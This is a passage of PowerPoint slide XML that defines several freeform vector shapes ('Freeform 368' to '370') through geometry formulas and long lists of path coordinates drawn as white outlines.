                      <a:pt x="36" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="110" y="80"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="102" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="39" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="99"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36235" name="Freeform 368"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1765" y="2095"/>
                <a:ext cx="25" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 9 w 25"/>
                  <a:gd name="T1" fmla="*/ 34 h 34"/>
                  <a:gd name="T2" fmla="*/ 6 w 25"/>
                  <a:gd name="T3" fmla="*/ 34 h 34"/>
                  <a:gd name="T4" fmla="*/ 2 w 25"/>
                  <a:gd name="T5" fmla="*/ 31 h 34"/>
                  <a:gd name="T6" fmla="*/ 0 w 25"/>
                  <a:gd name="T7" fmla="*/ 25 h 34"/>
                  <a:gd name="T8" fmla="*/ 0 w 25"/>
                  <a:gd name="T9" fmla="*/ 19 h 34"/>
                  <a:gd name="T10" fmla="*/ 6 w 25"/>
                  <a:gd name="T11" fmla="*/ 11 h 34"/>
                  <a:gd name="T12" fmla="*/ 12 w 25"/>
                  <a:gd name="T13" fmla="*/ 0 h 34"/>
                  <a:gd name="T14" fmla="*/ 18 w 25"/>
                  <a:gd name="T15" fmla="*/ 5 h 34"/>
                  <a:gd name="T16" fmla="*/ 15 w 25"/>
                  <a:gd name="T17" fmla="*/ 9 h 34"/>
                  <a:gd name="T18" fmla="*/ 15 w 25"/>
                  <a:gd name="T19" fmla="*/ 14 h 34"/>
                  <a:gd name="T20" fmla="*/ 13 w 25"/>
                  <a:gd name="T21" fmla="*/ 17 h 34"/>
                  <a:gd name="T22" fmla="*/ 11 w 25"/>
                  <a:gd name="T23" fmla="*/ 19 h 34"/>
                  <a:gd name="T24" fmla="*/ 7 w 25"/>
                  <a:gd name="T25" fmla="*/ 22 h 34"/>
                  <a:gd name="T26" fmla="*/ 5 w 25"/>
                  <a:gd name="T27" fmla="*/ 26 h 34"/>
                  <a:gd name="T28" fmla="*/ 9 w 25"/>
                  <a:gd name="T29" fmla="*/ 29 h 34"/>
                  <a:gd name="T30" fmla="*/ 10 w 25"/>
                  <a:gd name="T31" fmla="*/ 29 h 34"/>
                  <a:gd name="T32" fmla="*/ 12 w 25"/>
                  <a:gd name="T33" fmla="*/ 26 h 34"/>
                  <a:gd name="T34" fmla="*/ 15 w 25"/>
                  <a:gd name="T35" fmla="*/ 22 h 34"/>
                  <a:gd name="T36" fmla="*/ 19 w 25"/>
                  <a:gd name="T37" fmla="*/ 19 h 34"/>
                  <a:gd name="T38" fmla="*/ 22 w 25"/>
                  <a:gd name="T39" fmla="*/ 20 h 34"/>
                  <a:gd name="T40" fmla="*/ 25 w 25"/>
                  <a:gd name="T41" fmla="*/ 24 h 34"/>
                  <a:gd name="T42" fmla="*/ 24 w 25"/>
                  <a:gd name="T43" fmla="*/ 28 h 34"/>
                  <a:gd name="T44" fmla="*/ 22 w 25"/>
                  <a:gd name="T45" fmla="*/ 30 h 34"/>
                  <a:gd name="T46" fmla="*/ 14 w 25"/>
                  <a:gd name="T47" fmla="*/ 34 h 34"/>
                  <a:gd name="T48" fmla="*/ 9 w 25"/>
                  <a:gd name="T49" fmla="*/ 34 h 3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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 34"/>
                  <a:gd name="T77" fmla="*/ 25 w 25"/>
                  <a:gd name="T78" fmla="*/ 34 h 3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5" h="34">
                    <a:moveTo>
                      <a:pt x="9" y="34"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="34"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36236" name="Freeform 369"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1798" y="1987"/>
                <a:ext cx="104" cy="117"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10 w 104"/>
                  <a:gd name="T1" fmla="*/ 71 h 117"/>
                  <a:gd name="T2" fmla="*/ 17 w 104"/>
                  <a:gd name="T3" fmla="*/ 61 h 117"/>
                  <a:gd name="T4" fmla="*/ 21 w 104"/>
                  <a:gd name="T5" fmla="*/ 62 h 117"/>
                  <a:gd name="T6" fmla="*/ 19 w 104"/>
                  <a:gd name="T7" fmla="*/ 52 h 117"/>
                  <a:gd name="T8" fmla="*/ 23 w 104"/>
                  <a:gd name="T9" fmla="*/ 40 h 117"/>
                  <a:gd name="T10" fmla="*/ 41 w 104"/>
                  <a:gd name="T11" fmla="*/ 10 h 117"/>
                  <a:gd name="T12" fmla="*/ 50 w 104"/>
                  <a:gd name="T13" fmla="*/ 3 h 117"/>
                  <a:gd name="T14" fmla="*/ 61 w 104"/>
                  <a:gd name="T15" fmla="*/ 1 h 117"/>
                  <a:gd name="T16" fmla="*/ 59 w 104"/>
                  <a:gd name="T17" fmla="*/ 6 h 117"/>
                  <a:gd name="T18" fmla="*/ 54 w 104"/>
                  <a:gd name="T19" fmla="*/ 8 h 117"/>
                  <a:gd name="T20" fmla="*/ 51 w 104"/>
                  <a:gd name="T21" fmla="*/ 22 h 117"/>
                  <a:gd name="T22" fmla="*/ 40 w 104"/>
                  <a:gd name="T23" fmla="*/ 44 h 117"/>
                  <a:gd name="T24" fmla="*/ 42 w 104"/>
                  <a:gd name="T25" fmla="*/ 47 h 117"/>
                  <a:gd name="T26" fmla="*/ 48 w 104"/>
                  <a:gd name="T27" fmla="*/ 39 h 117"/>
                  <a:gd name="T28" fmla="*/ 59 w 104"/>
                  <a:gd name="T29" fmla="*/ 40 h 117"/>
                  <a:gd name="T30" fmla="*/ 55 w 104"/>
                  <a:gd name="T31" fmla="*/ 50 h 117"/>
                  <a:gd name="T32" fmla="*/ 67 w 104"/>
                  <a:gd name="T33" fmla="*/ 57 h 117"/>
                  <a:gd name="T34" fmla="*/ 74 w 104"/>
                  <a:gd name="T35" fmla="*/ 52 h 117"/>
                  <a:gd name="T36" fmla="*/ 82 w 104"/>
                  <a:gd name="T37" fmla="*/ 52 h 117"/>
                  <a:gd name="T38" fmla="*/ 92 w 104"/>
                  <a:gd name="T39" fmla="*/ 57 h 117"/>
                  <a:gd name="T40" fmla="*/ 87 w 104"/>
                  <a:gd name="T41" fmla="*/ 63 h 117"/>
                  <a:gd name="T42" fmla="*/ 84 w 104"/>
                  <a:gd name="T43" fmla="*/ 71 h 117"/>
                  <a:gd name="T44" fmla="*/ 90 w 104"/>
                  <a:gd name="T45" fmla="*/ 75 h 117"/>
                  <a:gd name="T46" fmla="*/ 96 w 104"/>
                  <a:gd name="T47" fmla="*/ 72 h 117"/>
                  <a:gd name="T48" fmla="*/ 98 w 104"/>
                  <a:gd name="T49" fmla="*/ 75 h 117"/>
                  <a:gd name="T50" fmla="*/ 93 w 104"/>
                  <a:gd name="T51" fmla="*/ 81 h 117"/>
                  <a:gd name="T52" fmla="*/ 86 w 104"/>
                  <a:gd name="T53" fmla="*/ 83 h 117"/>
                  <a:gd name="T54" fmla="*/ 89 w 104"/>
                  <a:gd name="T55" fmla="*/ 91 h 117"/>
                  <a:gd name="T56" fmla="*/ 92 w 104"/>
                  <a:gd name="T57" fmla="*/ 92 h 117"/>
                  <a:gd name="T58" fmla="*/ 98 w 104"/>
                  <a:gd name="T59" fmla="*/ 91 h 117"/>
                  <a:gd name="T60" fmla="*/ 98 w 104"/>
                  <a:gd name="T61" fmla="*/ 98 h 117"/>
                  <a:gd name="T62" fmla="*/ 104 w 104"/>
                  <a:gd name="T63" fmla="*/ 98 h 117"/>
                  <a:gd name="T64" fmla="*/ 103 w 104"/>
                  <a:gd name="T65" fmla="*/ 104 h 117"/>
                  <a:gd name="T66" fmla="*/ 99 w 104"/>
                  <a:gd name="T67" fmla="*/ 117 h 117"/>
                  <a:gd name="T68" fmla="*/ 92 w 104"/>
                  <a:gd name="T69" fmla="*/ 115 h 117"/>
                  <a:gd name="T70" fmla="*/ 90 w 104"/>
                  <a:gd name="T71" fmla="*/ 107 h 117"/>
                  <a:gd name="T72" fmla="*/ 83 w 104"/>
                  <a:gd name="T73" fmla="*/ 111 h 117"/>
                  <a:gd name="T74" fmla="*/ 86 w 104"/>
                  <a:gd name="T75" fmla="*/ 102 h 117"/>
                  <a:gd name="T76" fmla="*/ 83 w 104"/>
                  <a:gd name="T77" fmla="*/ 93 h 117"/>
                  <a:gd name="T78" fmla="*/ 78 w 104"/>
                  <a:gd name="T79" fmla="*/ 97 h 117"/>
                  <a:gd name="T80" fmla="*/ 72 w 104"/>
                  <a:gd name="T81" fmla="*/ 101 h 117"/>
                  <a:gd name="T82" fmla="*/ 65 w 104"/>
                  <a:gd name="T83" fmla="*/ 109 h 117"/>
                  <a:gd name="T84" fmla="*/ 56 w 104"/>
                  <a:gd name="T85" fmla="*/ 112 h 117"/>
                  <a:gd name="T86" fmla="*/ 55 w 104"/>
                  <a:gd name="T87" fmla="*/ 108 h 117"/>
                  <a:gd name="T88" fmla="*/ 67 w 104"/>
                  <a:gd name="T89" fmla="*/ 98 h 117"/>
                  <a:gd name="T90" fmla="*/ 67 w 104"/>
                  <a:gd name="T91" fmla="*/ 93 h 117"/>
                  <a:gd name="T92" fmla="*/ 60 w 104"/>
                  <a:gd name="T93" fmla="*/ 97 h 117"/>
                  <a:gd name="T94" fmla="*/ 56 w 104"/>
                  <a:gd name="T95" fmla="*/ 96 h 117"/>
                  <a:gd name="T96" fmla="*/ 51 w 104"/>
                  <a:gd name="T97" fmla="*/ 91 h 117"/>
                  <a:gd name="T98" fmla="*/ 47 w 104"/>
                  <a:gd name="T99" fmla="*/ 96 h 117"/>
                  <a:gd name="T100" fmla="*/ 35 w 104"/>
                  <a:gd name="T101" fmla="*/ 96 h 117"/>
                  <a:gd name="T102" fmla="*/ 19 w 104"/>
                  <a:gd name="T103" fmla="*/ 93 h 117"/>
                  <a:gd name="T104" fmla="*/ 2 w 104"/>
                  <a:gd name="T105" fmla="*/ 96 h 117"/>
                  <a:gd name="T106" fmla="*/ 0 w 104"/>
                  <a:gd name="T107" fmla="*/ 89 h 117"/>
                  <a:gd name="T108" fmla="*/ 5 w 104"/>
                  <a:gd name="T109" fmla="*/ 83 h 117"/>
                  <a:gd name="T110" fmla="*/ 14 w 104"/>
                  <a:gd name="T111" fmla="*/ 77 h 117"/>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104"/>
                  <a:gd name="T169" fmla="*/ 0 h 117"/>
                  <a:gd name="T170" fmla="*/ 104 w 104"/>
                  <a:gd name="T171" fmla="*/ 117 h 117"/>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104" h="117">
                    <a:moveTo>
                      <a:pt x="19" y="73"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="99"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="56" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="79"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="73"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36237" name="Freeform 370"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="701" y="2005"/>
                <a:ext cx="77" cy="59"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 72 w 77"/>
                  <a:gd name="T1" fmla="*/ 59 h 59"/>
                  <a:gd name="T2" fmla="*/ 63 w 77"/>
                  <a:gd name="T3" fmla="*/ 55 h 59"/>
                  <a:gd name="T4" fmla="*/ 53 w 77"/>
                  <a:gd name="T5" fmla="*/ 51 h 59"/>
                  <a:gd name="T6" fmla="*/ 52 w 77"/>
                  <a:gd name="T7" fmla="*/ 49 h 59"/>
                  <a:gd name="T8" fmla="*/ 52 w 77"/>
                  <a:gd name="T9" fmla="*/ 47 h 59"/>
                  <a:gd name="T10" fmla="*/ 55 w 77"/>
                  <a:gd name="T11" fmla="*/ 42 h 59"/>
                  <a:gd name="T12" fmla="*/ 47 w 77"/>
                  <a:gd name="T13" fmla="*/ 42 h 59"/>
                  <a:gd name="T14" fmla="*/ 44 w 77"/>
                  <a:gd name="T15" fmla="*/ 44 h 59"/>
                  <a:gd name="T16" fmla="*/ 42 w 77"/>
                  <a:gd name="T17" fmla="*/ 44 h 59"/>
                  <a:gd name="T18" fmla="*/ 39 w 77"/>
                  <a:gd name="T19" fmla="*/ 42 h 59"/>
                  <a:gd name="T20" fmla="*/ 40 w 77"/>
                  <a:gd name="T21" fmla="*/ 37 h 59"/>
                  <a:gd name="T22" fmla="*/ 37 w 77"/>
                  <a:gd name="T23" fmla="*/ 33 h 59"/>
                  <a:gd name="T24" fmla="*/ 35 w 77"/>
                  <a:gd name="T25" fmla="*/ 33 h 59"/>
                  <a:gd name="T26" fmla="*/ 30 w 77"/>
                  <a:gd name="T27" fmla="*/ 32 h 59"/>
                  <a:gd name="T28" fmla="*/ 28 w 77"/>
                  <a:gd name="T29" fmla="*/ 29 h 59"/>
                  <a:gd name="T30" fmla="*/ 30 w 77"/>
                  <a:gd name="T31" fmla="*/ 26 h 59"/>
                  <a:gd name="T32" fmla="*/ 23 w 77"/>
                  <a:gd name="T33" fmla="*/ 20 h 59"/>
                  <a:gd name="T34" fmla="*/ 19 w 77"/>
                  <a:gd name="T35" fmla="*/ 21 h 59"/>
                  <a:gd name="T36" fmla="*/ 17 w 77"/>
                  <a:gd name="T37" fmla="*/ 20 h 59"/>
                  <a:gd name="T38" fmla="*/ 11 w 77"/>
                  <a:gd name="T39" fmla="*/ 14 h 59"/>
                  <a:gd name="T40" fmla="*/ 2 w 77"/>
                  <a:gd name="T41" fmla="*/ 5 h 59"/>
                  <a:gd name="T42" fmla="*/ 0 w 77"/>
                  <a:gd name="T43" fmla="*/ 2 h 59"/>
                  <a:gd name="T44" fmla="*/ 0 w 77"/>
                  <a:gd name="T45" fmla="*/ 1 h 59"/>
                  <a:gd name="T46" fmla="*/ 7 w 77"/>
                  <a:gd name="T47" fmla="*/ 0 h 59"/>
                  <a:gd name="T48" fmla="*/ 9 w 77"/>
                  <a:gd name="T49" fmla="*/ 0 h 59"/>
                  <a:gd name="T50" fmla="*/ 23 w 77"/>
                  <a:gd name="T51" fmla="*/ 7 h 59"/>
                  <a:gd name="T52" fmla="*/ 30 w 77"/>
                  <a:gd name="T53" fmla="*/ 9 h 59"/>
                  <a:gd name="T54" fmla="*/ 43 w 77"/>
                  <a:gd name="T55" fmla="*/ 11 h 59"/>
                  <a:gd name="T56" fmla="*/ 46 w 77"/>
                  <a:gd name="T57" fmla="*/ 14 h 59"/>
                  <a:gd name="T58" fmla="*/ 51 w 77"/>
                  <a:gd name="T59" fmla="*/ 20 h 59"/>
                  <a:gd name="T60" fmla="*/ 54 w 77"/>
                  <a:gd name="T61" fmla="*/ 27 h 59"/>
                  <a:gd name="T62" fmla="*/ 57 w 77"/>
                  <a:gd name="T63" fmla="*/ 32 h 59"/>
                  <a:gd name="T64" fmla="*/ 59 w 77"/>
                  <a:gd name="T65" fmla="*/ 34 h 59"/>
